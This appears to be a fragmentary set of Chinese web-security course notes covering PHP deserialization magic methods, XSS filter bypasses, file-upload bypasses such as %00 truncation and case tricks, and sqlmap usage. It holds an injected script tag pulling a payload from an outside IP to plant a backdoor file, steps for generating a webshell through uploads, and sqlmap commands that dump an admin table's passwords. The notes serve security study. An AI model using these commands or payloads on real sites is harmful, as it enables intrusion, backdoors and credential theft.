060 PHP反序列化&POP链构造&魔术方法流程&漏洞触发条件&属性修改 如果一个对象类中存在__toString魔术方法,这个对象类被当做字符串进行处理时,就会触发__toString魔术方法。// echo '__get 不存在成员变量'.$name.'';// // __get():访问不存在的成员变量时调用。//// 不存在成员变量spaceman,所以调用__get。////将对象当做函数调用 触发__invoke魔术方法。// 不存在xiaodi方法 触发__call魔术方法。//// 存在成员变量n,所以不调用__get。
XSS http://xss-ctf.xiejiahe.com/ 事件关键字过滤 利用其他标签调用 双引号闭合。、全部实体化 利用标签事件 单引号闭合。、全部实体化 利用标签事件 双引号闭合。、利用Unicode编码(内容检测)、利用Unicode编码。、利用大小写未正则匹配。、实体化 输入框没有。
055 XSS跨站 JS后门植入&CSP策略&HttpOnly 后台用户名输入 <script src="http://1.14.97.254/poc1.js"></script> 访问poc1.js文件触发跨站生成后门文件1.php。内容安全策略是一种可信白名单机制,来限制网站中是否可以包含某来源内容。该制度明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单,禁止未授权的脚本执行(新特性,Google Map 移动版在使用)。禁止外域提交,网站被攻击后,用户的数据不会泄露到外域。禁止加载外域代码,防止复杂的攻击逻辑。,利于尽快修复问题。
047 PHP上传 6-10题 黑名单&%00截断&黑名单缺陷&逻辑缺陷 PHP 内核是由 C 语言实现的,所以使用了 C 语言中的一些字符串处理函数。所以在这个地方,攻击者只要在最后加入一个 0 字节,就能截断 file 变量之后的字符串 PHP小于5.3版本可以输入a.php%00进行截断。然后不停的访问上传shell.php和不停的访问upload/shell.php就能生成xiao.php。禁止后缀为php的文件上传,由于系统特性区分大小写 于是可以1.PHp上传。写一个shell.php访问就生成一个xiao.php的后门文件。因为在下面 所以要对%00进行解码。
046 sql-代理 python .\sqlmap.py -u "http://localhost/new.php?id=1" --level=3 --risk=2 --proxy "http://127.0.0.1:8080/"
046 sqlmap-post 所以我们的注入语句应该是:python ./sqlmap.py "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --tables。抓取登录数据包表单数据:uname=test&pass=test。
046 sqlmap-get id=2" --dump -C "password,username,id" -T "admin" -D "demo01" 得到信息。权限都是有的,莫非我们不是root?emmmm不知道奥哈哈 反正不是root也不能确定。